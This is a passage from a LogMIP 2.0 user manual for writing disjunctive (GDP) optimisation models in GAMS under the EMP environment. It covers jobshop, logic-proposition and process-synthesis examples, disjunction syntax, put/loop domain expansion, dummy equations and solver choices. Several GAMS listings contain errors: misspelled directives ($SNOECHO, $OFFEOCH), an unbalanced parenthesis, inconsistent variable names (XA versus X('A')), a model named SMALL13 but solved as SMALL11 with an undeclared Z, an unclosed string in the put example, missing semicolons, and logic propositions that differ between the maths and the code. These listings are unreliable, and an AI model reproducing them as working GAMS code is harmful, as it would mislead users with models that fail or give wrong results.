solvers, in the next sections three small examples are presented in order to illustrate the meaning of the previous GDP formulation. The first two corresponds to linear models, the later to a nonlinear one. 2.1. SMALL EXAMPLE 1 This example corresponds to a Jobshop (Jobshop scheduling) problem, having three jobs (A,B,C) that must be executed sequentially in three steps (1,2,3), but not all jobs require all the stages, meaning that the jobs will be executed in a subset of stages. 
The processing time for each stage is given by the following table: <table> <thead> <tr> <th>Job</th> <th>stage</th> <th>1</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>A</td> <td></td> <td>5</td> <td>-</td> <td>3</td> </tr> <tr> <td>B</td> <td></td> <td>-</td> <td>3</td> <td>2</td> </tr> <tr> <td>C</td> <td></td> <td>2</td> <td>4</td> <td>-</td> </tr> </tbody> </table> The objective is to obtain the sequence of task, which minimizes the completion time \( T \). In order to obtain a feasible solution the clashes between the jobs must be eliminated. For more details about this formulation see Raman y Grossmann (1994). LogMIP input file for this example First Version – Using 3 explicit binary variables BINARY VARIABLES Y1, Y2, Y3; POSITIVE VARIABLES XA, XB, XC, T; VARIABLE Z; EQUATIONS EQUAT1, EQUAT2, EQUAT3, EQUAT4, EQUAT5, EQUAT6, EQUAT7, EQUAT8, EQUAT9, DUMMY, OBJECTIVE; EQUAT1.. T =G= XA + 8; EQUAT2.. T =G= XB + 5; EQUAT3.. T =G= XC + 6; EQUAT4.. XA – XC + 5 =L= 0; EQUAT5.. XC – XA + 2 =L= 0; EQUAT6.. XB – XC + 1 =L= 0; EQUAT7.. XC – XB + 6 =L= 0; EQUAT8.. XA – XB + 5 =L= 0; EQUAT9.. XB - XA =L= 0; OBJECTIVE.. Z =E= T; XA.UP=20.; XB.UP=20.; XC.UP=20.; DUMMY.. Y1+Y2+Y3 =G= 0; $ONECHO > "%lm.info%" * by default the convex hull reformulation is used disjunction Y1 equat4 else equat5 disjunction Y2 equat6 else equat7 disjunction Y3 equat8 else equat9 * optional, if not set EMP will find the modelftype suitable modelftype mip $OFFECHO OPTION EMP = LOGMIP; Calls LogMIP solvers now belonging to the EMP environment OPTION OPTCR=0.0; MODEL SMALL11 /ALL/; SOLVE SMALL11 USING EMP MINIMIZING Z; EMP must be in the SOLVE sentence which includes LogMIP Second Version – Using default Boolean variables in disjunction definitions POSITIVE VARIABLES XA, XB, XC, T; VARIABLE Z; EQUATIONS EQUAT1, EQUAT2, EQUAT3, EQUAT4, EQUAT5, EQUAT6, EQUAT7, EQUAT8, EQUAT9, OBJECTIVE; EQUAT1.. T =G= XA + 8; EQUAT2.. T =G= XB + 5; EQUAT3.. T =G= XC + 6; EQUAT4.. 
XA - XC + 5 =L= 0; EQUAT5.. XC - XA + 2 =L= 0; EQUAT6.. XB - XC + 1 =L= 0; EQUAT7.. XC - XB + 6 =L= 0; EQUAT8.. X('A')-X('B')+ 5 =L= 0; EQUAT9.. X('B')-X('A') =L= 0; OBJECTIVE.. Z =E= T; XA.UP=20.; XB.UP=20.; XC.UP=20.; $ONECHO > "%lm.info%" default BigM disjunction * equat4 else equat5 disjunction * equat6 else equat7 disjunction * equat8 else equat9 * optional, if not set EMP will find the modeltype suitable modeltype mip $OFFECHO OPTION EMP = LOGMIP; Call to LogMIP solvers, now belonging to the EMP environment OPTION OPTCR=0.0; MODEL SMALL11 /ALL/; SOLVE SMALL11 USING EMP MINIMIZING Z; EMP must be in the SOLVE sentence. EMP includes LogMIP Constraints independent of discrete choices (disjunctions) Constraints for discrete choices (disjunctions) By means of this sentence LogMIP is forced to executed the BIGM relaxation method with default values of the M parameter Disjunction definitions according to the new (EMP) syntax rules. The * symbol is replaced by a default binary variable names in this case GAMS’s variable and equation declarations. NOTE THAT no binary variables are defined here because * is defined in disjunction’s section Note that a constraint belonging to a disjunction term is declared (given its name) in this section. SETS J JOBS / A, B, C / S STAGES / 1*3 / GG(J,J) Upper Triangle ALIAS (J,JJ),(S,SS); TABLE P(J,S) Processing Time 1 2 3 A 5 3 B 3 2 C 2 4 PARAMETER C(J,S) Stage Completion Time W(J,JJ) Maximum Pairwise Waiting Time PT(J) Total Processing Time BIG The Famous Big M; GG(J,JJ) = ORD(J) < ORD(JJ); C(J,S) = SUM(SS$(ORD(SS)<=ORD(S)), P(J,SS)); W(J,JJ) = SMAX(S, C(J,S) - C(JJ,S-1)); PT(J) = SUM(S, P(J,S)); BIG = SUM(J, PT(J)); VARIABLES T Completion Time X(J) Job Starting Time Y(J,JJ) Job Precedence POSITIVE VARIABLE X; BINARY VARIABLE Y; EQUATIONS COMP(J) Job Completion Time SEQ(J,JJ) Job Sequencing DUMMY; COMP(J).. T =G= X(J) + PT(J); SEQ(J,JJ)$$(ORD(J) <> ORD(JJ)).. X(J) + W(J,JJ) =L= X(JJ); DUMMY.. 
SUM(GG(J,JJ), Y(J,JJ)) =G= 0; X.UP(J) = BIG; MODEL SMALL13 / ALL /; file lg / '%lm.info%' /; put lg '* problem %gams.i%'; loop(gg(j,jj)$$(ord(j) <> ord(jj)), put /'disjunction' Y(j,jj) seq(j,jj) 'else' seq(jj,j)); putclose; OPTION EMP = LOGMIP; Calls LogMIP solvers, now belonging to the EMP environment OPTION OPTCR=0.0; MODEL SMALL11 /ALL/; SOLVE SMALL11 USING EMP MINIMIZING Z; NOTE THAT when a disjunction is defined over a domain, the elements expansion must be done by using file, put and loop or while GAMS sentences. The control over de domain is done through de the dollar sign $. Do not forget to include a line feed (/) when you write a new disjunction. 2.2. SMALL EXAMPLE 2 Small example for illustration purpose. It is composed by two disjunctions each one with two terms. Each term of the first disjunction is handled by different variables. The first term is true if \( Y_1 \) is true; the second term of the first disjunction is true if \( Y_2 \) is true. The second disjunction is handled just for one variable: \( Y_3 \). The first term apply if \( Y_3 \) is true, the second if \( Y_3 \) is false. The logic propositions indicates that: 1. If \( Y_1 \) is true and \( Y_2 \) false it implies that \( Y_3 \) must be false. 2. \( Y_2 \) and \( Y_3 \) cannot be both true at the same time. LogMIP input file for this example ``` SCALAR M /100/ BINARY VARIABLES Y1,Y2,Y3; POSITIVE VARIABLES X1,X2,X3, C; VARIABLE Z; EQUATIONS EQUAT1, EQUAT2, EQUAT3, EQUAT4, EQUAT5, EQUAT6, OBJECTIVE; EQUAT1.. X2 =L= X1 - 2; EQUAT2.. C =E= 5; EQUAT3.. X2 =G= 2; EQUAT4.. C =E= 7; EQUAT5.. X1-X2 =L= 1 ; EQUAT6.. X1 =E= M * Y3; Logic Equation L1,L2,L3; L1.. y1 and not y2 -> not y3; L2.. y2 -> not y3; L3.. y3 -> not y2; OBJECTIVE.. Z =E= C + 2*X('1') + X('2'); X.UP(J)=5; C.UP=7; $ONECHO > "%lm.info%" disjunction y1 equat1 equat2 elseif y2 equat3 equat4 disjunction y3 equat5 else equat6 $OFFECHO ``` NOTE THAT Logic Constraints are NOW declared (Logic Equation) and defined in the GAMS Section. 
GAMS has extended its Language Syntax to define this type of constraints observed the different syntax used to pose a two term disjunction; the first one where the terms are handled by two different variables (\( y_1 \) and \( y_2 \)); while the second one is handled by just one variable (\( y_3 \)), one term is satisfied by the TRUE value and the other with FALSE. 2.3. NON-LINEAR EXAMPLE Synthesis of 8 processes \[ \min Z = \sum_{k=1}^{8} c_k + a^T x + 122 \] Subject to: Mass Balances \[ \begin{align*} x_1 &= x_2 + x_4, x_6 = x_7 + x_8 \\ x_3 + x_5 &= x_6 + x_{11} \\ x_{11} &= x_{12} + x_{15}, x_{13} = x_{19} + x_{21} \\ x_9 + x_{16} + x_{25} &= x_{17} \\ x_{20} + x_{22} &= x_{23}, x_{23} = x_{14} + x_{24} \end{align*} \] Specifications \[ \begin{align*} x_{10} - 0.8x_{17} &\leq 0, x_{10} - 0.4x_{17} \geq 0 \\ x_{12} - 5x_{14} &\leq 0, x_{12} - 2x_{14} \geq 0 \end{align*} \] Disjunctions: \[ \begin{align*} &Y_1 \\ &\text{exp}(x_3) - 1 - x_2 \leq 0 \\ &c_1 = 5 \end{align*} \begin{align*} &\quad \lor \\ &x_3 = x_2 = 0 \\ &c_1 = 0 \end{align*} \] \[ \begin{align*} &Y_2 \\ &\text{exp}(x_3 / 1.2) - 1 - x_4 \leq 0 \\ &c_2 = 5 \end{align*} \begin{align*} &\quad \lor \\ &x_4 = x_5 = 0 \\ &c_2 = 0 \end{align*} \] \[ \begin{align*} &Y_3 \\ &1.5x_3 + x_{10} - x_8 = 0 \\ &c_3 = 6 \end{align*} \begin{align*} &\quad \lor \\ &x_9 = 0, x_8 = x_{10} \\ &c_3 = 0 \end{align*} \] \[ \begin{align*} &Y_4 \\ &1.25(x_{12} + x_{14}) - x_{13} = 0 \\ &c_4 = 10 \end{align*} \begin{align*} &\quad \lor \\ &x_{12} = x_{13} = x_{14} = 0 \\ &c_4 = 0 \end{align*} \] \[ \begin{align*} &Y_5 \\ &x_{15} - 2x_{16} = 0 \\ &c_5 = 6 \end{align*} \begin{align*} &\quad \lor \\ &x_{15} = x_{16} = 0 \\ &c_5 = 0 \end{align*} \] \[ \begin{align*} &Y_6 \\ &\text{exp}(x_{20} / 1.5) - 1 - x_{19} \leq 0 \\ &c_6 = 7 \end{align*} \begin{align*} &\quad \lor \\ &x_{19} = x_{20} = 0 \\ &c_6 = 0 \end{align*} \] \[ \begin{align*} &Y_7 \\ &\text{exp}(x_{22}) - 1 - x_{21} \leq 0 \\ &c_7 = 4 \end{align*} \begin{align*} 
&\quad \lor \\ &x_{21} = x_{22} = 0 \\ &c_7 = 0 \end{align*} \] \[ \begin{align*} &Y_8 \\ &\text{exp}(x_{18}) - 1 - x_{10} - x_{17} \leq 0 \\ &c_8 = 5 \end{align*} \begin{align*} &\quad \lor \\ &x_{10} = x_{17} = x_{18} = 0 \\ &c_8 = 0 \end{align*} \] Logic Propositions: \[ Y_1 \Rightarrow Y_3 \lor Y_4 \lor Y_6 \\ Y_2 \Rightarrow Y_3 \lor Y_4 \lor Y_5 \\ Y_3 \Rightarrow Y_1 \lor Y_2 \\ Y_5 \Rightarrow Y_8 \\ Y_4 \Rightarrow Y_1 \lor Y_2 \\ Y_4 \lor Y_6 \lor Y_7 \\ Y_6 \Rightarrow Y_1 \lor Y_2 \] \[ Y_5 \Rightarrow Y_3 \lor Y_5 \lor (\neg Y_3 \land \neg Y_5) \\ Y_4 \lor Y_2 \\ Y_4 \lor Y_5 \\ Y_6 \lor Y_7 \] TITLE APPLICATION OF THE LOGIC-BASED MINLP ALGORITHM IN EXAMPLE #3 * THE FORMULATION IS DISJUNCTIVE $OFFSYXREF $OFFSYMLIST * SELECT OPTIMAL PROCESS FROM WITHIN GIVEN SUPERSTRUCTURE. * SETS I PROCESS STREAMS / 1*25 / J PROCESS UNITS / 1*8 / PARAMETERS CV(I) VARIABLE COST COEFF FOR PROCESS UNITS - STREAMS / 3 = -10 , 5 = -15 , 9 = -40 , 19 = 25 , 21 = 35 , 25 = -35 17 = 80 , 14 = 15 , 10 = 15 , 2 = 1 , 4 = 1 , 18 = -65 20 = -60 , 22 = -80 / VARIABLES PROF PROFIT ; BINARY VARIABLES Y(J) ; POSITIVE VARIABLES X(I) , CF(J); EQUATIONS * EQUATIONS Independent of discrete choices * -------------------------------------------------------- MASSBAL1, MASSBAL2, MASSBAL3, MASSBAL4, MASSBAL5, MASSBAL6, MASSBAL7, MASSBAL8 SPECS1, SPECS2, SPECS3, SPECS4 * EQUATIONS allowing flow just IFF the unit EXISTS * ------------------------------------------------- LOGICAL1, LOGICAL2, LOGICAL3, LOGICAL4, LOGICAL5, LOGICAL6, LOGICAL7, LOGICAL8 * DISJUNCTION'S CONSTRAINTS and EQUATIONS * INOUT11, INOUT12, INOUT13, INOUT14 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 1 INOUT21, INOUT22, INOUT23, INOUT24 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 2 INOUT31, INOUT32, INOUT33, INOUT34 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 3 INOUT41, INOUT42, INOUT43, INOUT44, INOUT45 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 4 INOUT51, INOUT52, INOUT53, INOUT54 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 5 INOUT61, INOUT62, 
INOUT63, INOUT64 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 6 INOUT71, INOUT72, INOUT73, INOUT74 INPUT-OUTPUT RELATIONS FOR PROCESS UNIT 7 INOUT81, INOUT82, INOUT83, INOUT84, INOUT85, INOUT86 FOR PROCESS UNIT 8 OBJETIVO OBJECTIVE FUNCTION DEFINITION ; * BOUNDS SECTION: X.UP('5') = 2.0 ; X.UP('5') = 2.0 ; X.UP('9') = 2.0 ; X.UP('10') = 1.0 ; X.UP('14') = 1.0 ; X.UP('17') = 2.0 ; X.UP('19') = 2.0 ; X.UP('21') = 2.0 ; X.UP('25') = 3.0 ; *DEFINITIONS of EQUATIONS Independent of discrete choices MASSBAL1... X('13') =E= X('19') + X('21'); MASSBAL2... X('17') =E= X('9') + X('16') + X('25'); MASSBAL3... X('11') =E= X('12') + X('15'); MASSBAL4... X('3') + X('5') =E= X('6') + X('11'); MASSBAL5... X('6') =E= X('7') + X('8'); MASSBAL6... X('23') =E= X('20') + X('22'); MASSBAL7... X('23') =E= X('14') + X('24'); MASSBAL8... X('1') =E= X('2') + X('4'); SPECS1... X('10') =L= 0.8 * X('17'); SPECS2... X('10') =G= 0.4 * X('17'); SPECS3... X('12') =L= 5.0 * X('14'); SPECS4... X('12') =G= 2.0 * X('14'); * DEFINITION of EQUATIONS allowing flow just IFF the unit EXISTS LOGICAL1... X('2') + X('3') =L= 10. * Y('1'); LOGICAL2... X('4') + X('5') =L= 10. * Y('2'); LOGICAL3... X('9') =L= 10. * Y('3'); LOGICAL4... X('12') + X('14') =L= 10. * Y('4'); LOGICAL5... X('15') =L= 10. * Y('5'); LOGICAL6... X('19') =L= 10. * Y('6'); DEFINITIONS of DISJUNCTION's EQUATIONS INOUT11.. EXP(X('3')) -1. =E= X('2') INOUT14.. CF('1') =E= 5 INOUT12.. X('2') =E= 0 INOUT13.. X('3') =E= 0 INOUT21.. EXP(X('5')/1.2) -1. =E= X('4') INOUT24.. CF('2') =E= 8 INOUT22.. X('4') =E= 0 INOUT23.. X('5') =E= 0 INOUT31.. 1.5 * X('9') + X('10') =E= X('8') INOUT34.. CF('3') =E= 6 INOUT32.. X('9') =E= 0 INOUT41.. 1.25 * (X('12')+X('14')) =E= X('13') INOUT45.. CF('4') =E= 10 INOUT42.. X('12') =E= 0 INOUT43.. X('13') =E= 0 INOUT44.. X('14') =E= 0 INOUT51.. X('15') =E= 2. * X('16') INOUT54.. CF('5') =E= 6 INOUT52.. X('15') =E= 0 INOUT53.. X('16') =E= 0 INOUT61.. EXP(X('20')/1.5) -1. =E= X('19') INOUT64.. CF('6') =E= 7 INOUT62.. 
X('19') =E= 0 INOUT63.. X('20') =E= 0 INOUT71.. EXP(X('22')) -1. =E= X('21') INOUT74.. CF('7') =E= 4 INOUT72.. X('21') =E= 0 INOUT73.. X('22') =E= 0 INOUT81.. EXP(X('18') -1. =E= X('10') + X('17') INOUT86.. CF('8') =E= 5 INOUT82.. X('10') =E= 0 INOUT83.. X('17') =E= 0 INOUT84.. X('18') =E= 0 INOUT85.. X('25') =E= 0 OBSERUVE .. PROF =E= SUM(J,CF(J)) + SUM(I , X(I)*CV(I)) + 122 LOGIC EQUATION ATMOST1; ATMOST1.. Y('1') xor Y('2'); LOGIC EQUATION ATMOST2; ATMOST2.. Y('4') xor Y('5'); LOGIC EQUATION ATMOST3; ATMOST3.. Y('6') xor Y('7'); LOGIC EQUATION IMP0; IMP0.. Y('1') -> Y('3') or Y('4') or Y('5'); LOGIC EQUATION IMP1; IMP1.. Y('2') -> Y('3') or Y('4') or Y('5'); LOGIC EQUATION IMP2; IMP2.. Y('3') -> Y('8'); LOGIC EQUATION IMP3; IMP3.. Y('3') -> Y('1') or Y('2'); LOGIC EQUATION IMP4; IMP4.. Y('4') -> Y('1') or Y('2'); LOGIC EQUATION IMP5; IMP5.. Y('4') -> Y('6') or Y('7'); LOGIC EQUATION IMP6; IMP6.. Y('5') -> Y('1') or Y('2'); LOGIC EQUATION IMP7; IMP7.. Y('5') -> Y('8'); LOGIC EQUATION IMP8; IMP8.. Y('6') -> Y('1'); LOGIC EQUATION IMP9; IMP9.. Y('7') -> Y('4'); * BEGIN DECLARATIONS AND DEFINITIONS OF DISJUNCTIONS (LOGMIP Section) $SNOECHO > %LM.INFO% DISJUNCTION Y('1') INOUT11 INOUT14 ELSE INOUT12 INOUT13 DISJUNCTION Y('2') INOUT21 INOUT24 ELSE INOUT22 INOUT23 DISJUNCTION Y('3') INOUT31 INOUT34 ELSE INOUT32 DISJUNCTION Y('4') INOUT41 INOUT45 ELSE INOUT42 INOUT43 INOUT44 DISJUNCTION Y('5') INOUT51 INOUT54 ELSE INOUT52 INOUT53 DISJUNCTION Y('6') INOUT61 INOUT64 ELSE INOUT62 INOUT63 DISJUNCTION Y('7') INOUT71 INOUT74 ELSE INOUT72 INOUT73 DISJUNCTION Y('8') INOUT81 INOUT86 ELSE INOUT82 INOUT83 INOUT84 INOUT85 * optional, if not set LOGMIP will find the modeltype suitable MODELTYPE MINLP $OFFEOCH OPTION EMP=LogMIP; OPTION OPTCR=0.0; MODEL EXAMPLE3 / ALL /; SOLVE EXAMPLE3 USING EMP MINIMIZING PROF ; 3. 
How to write in GAMS a disjunctive model for LogMIP The steps to write a problem into GAMS are the following: a) Write in a GAMS input file (extension .gms) the sets, scalars, parameters, variables, equations and constraints, and any other component necessary for the problem, like if you were writing an algebraic problem. - You must be familiar with GAMS notation to do so. - You must also declare and define in this section the equations and constraints employed in disjunction terms. b) If you are not going to define disjunctions over a domain, write in the same GAMS input file the sentences: $\text{ONECHO} > "\%lm.info\%$ $\text{OFFECHO}$ the dollar sign must be in the 1st column. You must write all three keywords, between these two sentences you must include disjunction definitions according to the rules of LogMIP language which have changed to be included in the EMP Environment. The syntax to write a disjunction is the following: ``` \text{DISJUNCTION \[ \text{chull} [\text{chull eps}] | \text{bigM} [\text{bigM Mvalue}] | \text{indic} ]} [\text{Not}] \text{Var} | * \{ \text{equ} \} \{\text{ELSEIF} [\text{Not}] \text{Var} | * \{\text{equ}\}\} [\text{ELSE} \{\text{equ}\}] ``` According to the GAMS syntax rules the meanings of some symbols are the following: - [ ] enclosed construct are optional - { } enclosed construct may be repeated zero or more times - | or \text{DISJUNCTION} is a mandatory word, after that you have three optional constructs: ``` [chull [chull eps] | bigM [bigM Mvalue] | indic] ``` Which are related to the relaxation and transformation of disjunctions: - chull (convex hull) - bigM (big M relaxation) - indic (indicator constraint) In this version, you can choose among different relaxations for each disjunction. The default option is the convex hull. 
The convex hull and the bigM relaxations also have additional optional definitions: For the convex hull, the epsilon (eps) parameter is an upper bound value to check for constraint satisfaction (it has a default value). In the case of BigM relaxation, the Mvalue to be defined is the value of the M parameter, which should be large enough to relax the constraint. It also has a default value, but it is important to change to avoid infeasible solutions, for those cases where that value is not appropriate. The next specification is the variable to handle the disjunction term, by means of the following construct: \[ [\text{Not}] \ Var \ | \ * \] You must specify \texttt{Var} or *. The first option is to replace Var with a binary variable name defined in the GAMS section; * is employed when the variable name is assigned by GAMS. **NOTE THAT**: when using the Var option, make sure to write at least a \texttt{dummy equation} that uses them in order to avoid the GAMS compiler take out from the model if they are not used in other equation/constraint of the model. \texttt{[Not]} is the negation of the variable, by means of this sentence the disjunction term is satisfied using the FALSE value, instead of the TRUE value of the variable. \[ \{ \text{equ} \} \] represents a set of constraint names (previously defined in the GAMS section) that must be satisfied if the FIRST disjunction term is selected. 
For the definition of a several terms disjunction you must also add the following construct: \[ \{ \text{ELSEIF} \ [\text{Not}] \ Var \ | \ * \ \{ \text{equ} \}\} \] where \texttt{ELSEIF} is a mandatory word and then for each term you must specify a binary variable name (\texttt{Var}) or *, and also the constraints set to be satisfied (\{ \texttt{equ} \}) For the definition of a two terms disjunction using just one variable to handle both terms, you must also add the following construct: \[ \{ \text{ELSE} \ \{ \text{equ} \}\] \] where \texttt{ELSE} is a obligatory word, followed by the set of constraint to be satisfied if the term is selected. **NOTE THAT** since one variable is used to handle both terms the construct \texttt{Var} or * is not needed in the ELSE sentence. **Examples:** From Small Example 1 – First version: \[ disjunction \ Y1 \ equat4 \ else \ equat5 \] Corresponds to a two term disjunction having the following syntax rule: \[ \text{DISJUNCTION} \ Var \ \{ \text{equ} \} \ \text{ELSE} \ \{ \text{equ} \} \] From Small Example 1 – Second version: \[ disjunction \ * \ equat4 \ else \ equat5 \] Corresponds to a two term disjunction having the following syntax rule: DISJUNCTION * { equ } ELSE { equ } From Small Example 2: disjunction y1 equat1 equat2 elseif y2 equat3 equat4 Corresponds to a two term disjunction having the syntax rule of a several term, with the following syntax: DISJUNCTION Var { equ } ELSEIF Var { equ } c) Defining disjunctions over a domain The definition of a disjunction over a domain is performed using the put writing facilities of GAMS (for more references about this topic read chapter “The Put Writing Facility” in GAMS User’s Guide). The domain expansion is made via FILE and PUT sentences in combination with LOOP and/or WHILE GAMS sentences. To control disjunction’s domain, you must use the dollar sign ($) (for more references read section “The Dollar Condition” in GAMS User’s Guide). 
In the following paragraphs, the definition of disjunctions over a domain is illustrated using some examples. The following sentences are extracted from Third version of Small Example 1 in page 6 of this manual: ```gams 1 file lg / '%lm.info%' / 2 put lg '* problem %gams.i%' ; 3 loop(lt(jj,j) $$(ord(jj) <> ord(j)) , 4 put /'disjunction {Y(j,jj) seq(jj,j) else seq(jj,j)}; 5 putclose; ``` The first line defines a FILE where lg is an internal name for GAMS to refer to an external file, the name of the external file is %lm.info% which is the default name used for LogMIP info file. The second line (put lg) writes on the file a comment (* problem %gams.i%). The third line is a loop control sentence, the controlling domain is given by lt(jj,j), meaning that the loop will be executed over each member of the subset lt(jj,j) but just for those where the order of j is different to the order of jj, which is specified by the sentence $$(ord(jj) <> ord(j)). Line 4 writes in file lg a sentence containing the disjunction definition, suppose j is defined over domain 1,2 and 3, and that the order of j is 1 and 2, the consequence of executing line 4, the FILE lg will have the following line written: ``` Disjunction Y('1', '2') seq ('1', '2') else seq('2', '1') ``` In the next iteration of the loop sentence, the order of j changes to 3, then it writes a new line in the file, ``` Disjunction Y('1', '3') seq ('1', '3') else seq('3', '1') ``` This process continue until each one the elements of lt(jj,j) is covered Please note that a new line character (/) is inserted in line 4; if that character is not placed in the sentence, the previous lines would be written one next to the other, in this way: ``` Disjunction Y('1', '2') seq ('1', '2') else seq('2', '1') Disjunction Y('1', '3') seq ('1', '3') else seq('3', '1') ``` So, to avoid errors writing long lines it is important to include the line feed sentence (/) at the end of each line. 
The next example corresponds to a mid-term contract signature with suppliers; for more references about this problem visit www.minlp.org in the GDP problems section. The following sentences are extracted from that example.

```gams
1  file logMIP /'%LM.info%'/;
2  put logmip '* input=%gams.input'
3  put /'default BigM'/
4
5  loop((j,t)$((ord(j)=1 or ord(j)=6))
6  put /'disjunction *' ubb1(j,t) costbct(j,t)
7      ' elseif *' ubb2(j,t) costbct2(j,t)
8      ' elseif *' ubbno(j,t) costbno(j,t) ;
9  );
10
11 loop((j,t)$((ord(j)=1 or ord(j)=6))
12 put /'disjunction *' lb1(j,'1') costplct1(j,'1')
13    ' elseif *' lb21(j,'1') lb22(j,'2') costplct21(j,'1') costplct2(j,'2')
14    ' elseif *' lb31(j,'1') lb32(j,'2') lb33(j,'3') costplct31(j,'1')
15    costplct32(j,'2') costplct33(j,'3')
16    ' elseif *' lengno1(j,'1') lengno2(j,'2') lengno3(j,'3') costno1(j,'1')
17    costno2(j,'2') costno3(j,'3') ;
18 );
```

In line 1, the GAMS internal name of the file is LogMIP. The third line specifies that this problem is solved using the BigM relaxation. The first disjunction definition starts in line 5; it is defined over the domain of sets j and t. Set j is restricted to the elements of order 1 and 6, while the disjunction is expanded over the complete set t. Suppose that the domain of t is defined over 1 and 2; then the loop sentence posed in lines 5 to 9 writes the following sentence to the file:

```
disjunction * ubb1('1', '1') costbct1('1', '1') elseif * ubb2('1', '1') costbct2('1', '1') elseif * ubbno('1', '1') costbno('1', '1') ;
```

The second disjunction definition starts in line 11. Although it is also indexed by sets j and t, in this case only j is controlled in the loop sentence; the elements of set t are explicitly included in the constraint enumeration inside the disjunction.
Again, the lines that this sentence writes to the file are the following:

```
disjunction * lb1('1', '1') costplct1('1', '1')
 elseif * lb21('1', '1') lb22('1', '2') costplct21('1', '1') costplct22('1', '2')
 elseif * lb31('1', '1') lb32('1', '2') lb33('1', '3') costplct31('1', '1') costplct32('1', '2') costplct33('1', '3')
 elseif * lengno1('1', '1') lengno2('1', '2') lengno3('1', '3') costno1('1', '1') costno2('1', '2') costno3('1', '3') ;
```

3.1. Controlling the disjunction and constraint domains

The domain over which disjunctions and constraints must be satisfied is controlled via a loop sentence in combination with the dollar operator ($); this operator must be used in the same way as in GAMS constraint definitions.

3.2. Use of a DUMMY equation

Although it is not mandatory, we recommend writing a dummy equation in the GAMS section for the binary variables that handle disjunction terms (disjunction conditions). The purpose of this dummy equation is to prevent the GAMS compiler from eliminating those variables from the model (and from the matrix), which happens when some or all of the variables are not used in any other constraint of the model.

Suppose the following variables handling disjunction terms are defined in the GAMS section:

Binary variables Y(J);

If some or all variables of Y are not included in any equation or constraint defined in the GAMS section, they will be eliminated from the model, and the LogMIP compiler will report an error even though they handle disjunction terms. To avoid that, you must write the following constraint:

DUMMY.. SUM(J, Y(J)) =G= 0;

which is always satisfied. Another example:

Binary variables y, w, z;
DUMMY .. y + w + z =G= 0;

NOTE THAT this is not needed when you use the * option (default variable names) to handle disjunction terms.

4.
Logic Propositions

Logic propositions are used to pose relationships between the Boolean (binary) variables handling the disjunctive terms. Logic propositions must be declared and defined in the GAMS section.

4.1. Declaration Sentence

LOGIC EQUATION name

LOGIC EQUATION is a reserved word to specify a logic proposition; name must be provided by the user and must follow the rules of any constraint name.

4.2. Definition Sentence

The definition of a LOGIC EQUATION is similar to that of any other equation in the GAMS model (see Chapter 8, Equations, in the GAMS User's Guide), with the difference that it must include only the following operators:

<table>
<thead>
<tr>
<th>Operator Symbol</th>
<th>Operation</th>
</tr>
</thead>
<tbody>
<tr>
<td>-&gt;</td>
<td>Implication</td>
</tr>
<tr>
<td>&lt;-&gt;</td>
<td>equivalence</td>
</tr>
<tr>
<td>not</td>
<td>negation</td>
</tr>
<tr>
<td>and</td>
<td>logical and</td>
</tr>
<tr>
<td>or</td>
<td>logical or</td>
</tr>
<tr>
<td>xor</td>
<td>exclusive or</td>
</tr>
</tbody>
</table>

Examples:

Declaration sentence:

LOGIC EQUATION ATMOST1, ATMOST2, ATMOST3, IMP0, IMP1, IMP2;

Definition sentences:

ATMOST1.. Y('1') xor Y('2');
ATMOST2.. Y('4') xor Y('5');
ATMOST3.. Y('6') xor Y('7');
IMP0.. Y('1') -> Y('3') or Y('4') or Y('5');
IMP1.. Y('2') -> Y('3') or Y('4') or Y('5');
IMP2.. Y('3') -> Y('8');

5. SOLVERS

LogMIP can solve linear/nonlinear disjunctive hybrid models that follow the formulation shown in section 2 of this manual. Disjunctive models are those where discrete decisions are written only in the form of disjunctions, while hybrid models involve both disjunctions and mixed-integer constraints. By default, LogMIP decides which solver to run according to the model type (linear or non-linear).
The user can also specify the model type by including the following sentence in the LogMIP section:

modeltype [MIP|MINLP]

5.1. Solution algorithm for linear problems

Figure 1 shows how the solution of linear hybrid/disjunctive models is driven.

Fig. 1: Solution algorithm for linear models

The disjunctions defined in the model are transformed into mixed-integer formulations by using one of the proposed relaxations: Big-M, convex hull, or indicator constraints. The complete set of disjunctions can be transformed with one of those relaxations, or you can choose a different one for each disjunction in the model. The problem is thereby converted into a Mixed Integer Program (MIP), which is then solved by a branch and bound algorithm. References about the relaxations can be found in Balas (1979) and Vecchietti and Grossmann (2002).

The default relaxation is the convex hull. You can change it by introducing the following sentence in the LogMIP section:

**DEFAULT Big-M**

By means of this sentence, disjunctions are relaxed using the Big-M relaxation.

Since LogMIP 2.0 belongs to the EMP environment, to solve the problem you must write the following two sentences in the GAMS input file:

```plaintext
OPTION EMP=LOGMIP;
SOLVE modelname USING EMP [MINIMIZING | MAXIMIZING] variablename
```

5.2. Solution algorithm for non-linear problems

Figure 2 shows the flowchart for solving non-linear hybrid/disjunctive models.

Fig. 2: Solution algorithm for non-linear models

The disjunctions defined in the model are transformed into mixed-integer formulations by using one of the proposed relaxations for non-linear problems: Big-M or convex hull. The complete set of disjunctions can be transformed with one of those relaxations, or you can choose a different one for each disjunction in the model. The problem is thereby converted into a Mixed Integer Non-Linear Program, which is then solved by an MINLP solver such as SBB, DICOPT, BARON, AlphaECP, etc.
The Logic-Based Outer Approximation algorithm (Turkay and Grossmann, 1996a) is no longer available in this LogMIP version. A new implementation is under development and will be ready for a future release.

The default relaxation is the convex hull. You can change it by introducing the following sentence in the LogMIP section:

```
DEFAULT Big-M
```

By means of this sentence, disjunctions are relaxed using the Big-M relaxation.

Since LogMIP 2.0 belongs to the EMP environment, to solve the problem you must write the following two sentences in the GAMS input file:

```
OPTION EMP=LOGMIP;
SOLVE modelname USING EMP [MINIMIZING | MAXIMIZING] variablename
```

6. Recommendations and Limitations

- Write the GAMS file in a consistent order: declare SETS, VARIABLES and EQUATIONS at the beginning of the file, then pose the constraint, objective function and disjunction definitions, and finally write the option, model and solution sentences.
- Although GAMS is flexible about the declaration of equation and variable domains (you may declare them or not), it is strongly recommended to explicitly declare all domains for every variable and constraint defined in the model.
- If possible, write your entire model in a single file; do not use the INCLUDE sentence to import an external file into the model.
- Note that the constraints referenced in the disjunctions are tied to your declarations and definitions in the GAMS section; you cannot include in a disjunction the name of a constraint that was not previously defined. This is especially important for constraints defined in the GAMS section over a domain controlled by the dollar sign ($): disjunctive constraints must be in concordance with those defined in the GAMS section.
